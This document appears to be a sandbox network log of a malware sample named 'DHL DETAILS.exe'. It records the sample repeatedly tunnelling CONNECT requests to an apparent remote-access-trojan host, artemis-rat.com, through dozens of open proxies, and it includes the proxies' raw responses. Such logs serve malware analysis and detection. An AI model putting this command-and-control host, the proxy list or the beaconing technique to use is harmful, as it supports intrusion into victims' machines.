210	192.168.2.5	50937	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.104732990 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
211	192.168.2.5	49778	161.97.163.52	9045	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.105480909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.176935911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.270919085 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.270710945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366369009 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
212	192.168.2.5	50939	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.106398106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
213	192.168.2.5	50643	174.77.111.197	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.107800961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
214	192.168.2.5	50941	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.107964039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
215	192.168.2.5	50577	60.246.122.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.107985020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
216	192.168.2.5	50520	45.138.87.238	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.113202095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
217	192.168.2.5	50538	79.110.196.145	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.116378069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
218	192.168.2.5	50777	1.0.0.13	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.118102074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.272386074 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
219	192.168.2.5	50779	104.25.42.178	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.120441914 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.274653912 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
220	192.168.2.5	49752	41.65.236.37	1981	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.123218060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.176934004 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.270910978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:25.270714998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.366365910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
221	192.168.2.5	50535	51.161.131.84	25843	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.123218060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
222	192.168.2.5	50561	47.243.205.1	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.123341084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
223	192.168.2.5	50487	103.127.1.130	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.132870913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.518301964 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
224	192.168.2.5	50714	94.131.60.206	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.138740063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
225	192.168.2.5	50612	147.75.34.86	10010	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.139152050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.441939116 CET	65	IN	HTTP/1.1 200 Connection Established Proxy-Agent: Zscaler/6.3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
226	192.168.2.5	50609	116.203.28.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.141527891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.620332003 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:15 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
227	192.168.2.5	50589	54.233.119.172	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.158931017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.484571934 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
228	192.168.2.5	50653	89.38.99.29	20551	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.159506083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.452539921 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
229	192.168.2.5	50776	162.144.233.16	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.159636021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.645556927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.208081961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.093152046 CET	1286	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:17 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>500 Internal Server Error</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-rea
Mar 9, 2024 13:14:17.093221903 CET	1286	IN	Data Raw: 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e Data Ascii: son { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; backg
Mar 9, 2024 13:14:17.093238115 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a Data Ascii: font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: ce
Mar 9, 2024 13:14:17.093322992 CET	1286	IN	Data Raw: 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 Data Ascii: info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; m
Mar 9, 2024 13:14:17.093338013 CET	1286	IN	Data Raw: 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 Data Ascii: F+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9
Mar 9, 2024 13:14:17.093385935 CET	1286	IN	Data Raw: 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66 71 48 53 47 4d 35 68 42 57 31 49 55 49 30 66 2f 4c 64 Data Ascii: yMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvB
Mar 9, 2024 13:14:17.093400955 CET	1032	IN	Data Raw: 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69 34 34 72 46 70 66 71 54 5a 41 6e 57 2b 4a 46 52 47 33 6b 66 39 34 5a 2b 73 53 71 64 52 31 55 49 69 Data Ascii: fBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc
